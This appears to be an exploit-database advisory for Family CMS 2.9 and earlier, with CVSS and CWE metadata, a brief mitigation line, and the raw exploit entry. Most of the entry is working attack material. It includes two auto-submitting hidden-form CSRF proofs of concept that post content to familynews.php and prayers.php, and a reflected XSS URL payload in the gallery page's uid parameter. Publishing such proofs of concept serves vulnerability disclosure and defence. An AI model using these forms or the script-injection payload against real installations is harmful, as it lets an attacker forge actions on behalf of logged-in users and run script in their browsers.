Family CMS 2.9 and earlier multiple Vulnerabilities

vendor:

Family CMS

by:

Ahmed Elhady Mohamed

3,3

CVSS

MEDIUM

CSRF and XSS

352,79

CWE

Product Name: Family CMS

Affected Version From: 2.9

Affected Version To: 2.9

Patch Exists: NO

Related CWE: N/A

CPE: 2.9

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Ubuntu 11.4

2020

Family CMS 2.9 and earlier multiple Vulnerabilities

Family CMS 2.9 and earlier is vulnerable to CSRF and XSS. For CSRF, the POCs are provided in the text. For XSS, the POC is provided in the text.

Mitigation:

Implementing CSRF tokens and validating user input to prevent XSS attacks.

Source

Exploit-DB raw data:

Family CMS 2.9  and earlier multiple Vulnerabilities
===================================================================================
# Exploit Title: Family CMS 2.9  and earlier multiple Vulnerabilities
# Download link :http://sourceforge.net/projects/fam-connections/files/Family%20Connections/2.9/FCMS_2.9.zip/download
# Author: Ahmed Elhady Mohamed
# Email : ahmed.elhady.mohamed@gmail.com
# version: 2.9
# Category: webapps
# Tested on: ubuntu 11.4  
===================================================================================
 
 
 Tips:
	*****First we must install all optional sections during installation process.*****       
	      
1- CSRF Vulnerabilities :

	POC 1: Page "familynews.php"
	     
	   
		<html>
		    <head>
		        <script type="text/javascript">
		            function autosubmit() {
		                document.getElementById('ChangeSubmit').submit();
		            }  
		        </script>
		    </head>
		    <body  onLoad="autosubmit()">
		        <form method="POST"  action="http://[localhost]/FCMS_2.9/familynews.php"  id="ChangeSubmit">
		            <input type="hidden"  name="title"  value="test" />
		            <input type="hidden"  name="submitadd"  value="Add" />
		            <input type="hidden"  name="post"  value="testcsrf" />
		            <input type="submit" value="submit"/>
		        </form>
		    </body>
		</html>
	 
	 --------------------------------------------------------------------------------------------------------
	    
	 POC 2:Page "prayers.php"
	    

	      <html>
		<head>
		    <script type="text/javascript">
		        function autosubmit() {
		            document.getElementById('ChangeSubmit').submit();
		        }  
		    </script>
		</head>
		<body  onLoad="autosubmit()">
		    <form method="POST"  action="http://[localhost]/FCMS_2.9/prayers.php" id="ChangeSubmit">
		        <input type="hidden"  name="for"  value="test" />
		        <input type="hidden"  name="submitadd"  value="Add" />
		        <input type="hidden"  name="desc"  value="testtest" />
		        <input type="submit" value="submit"/>
		    </form>
		 
		</body>
	    </html>
----------------------------------------------------------------------------------------------------------------------------
2-Reflected XSS
	
	POC :   http://[localhost]/fcms_2.9/gallery/index.php?uid=%22%3E%3Cscript%3Ealert%28/xss/%29%3C/script%3E

-----------------------------------------------------------------------------------------------------------------------------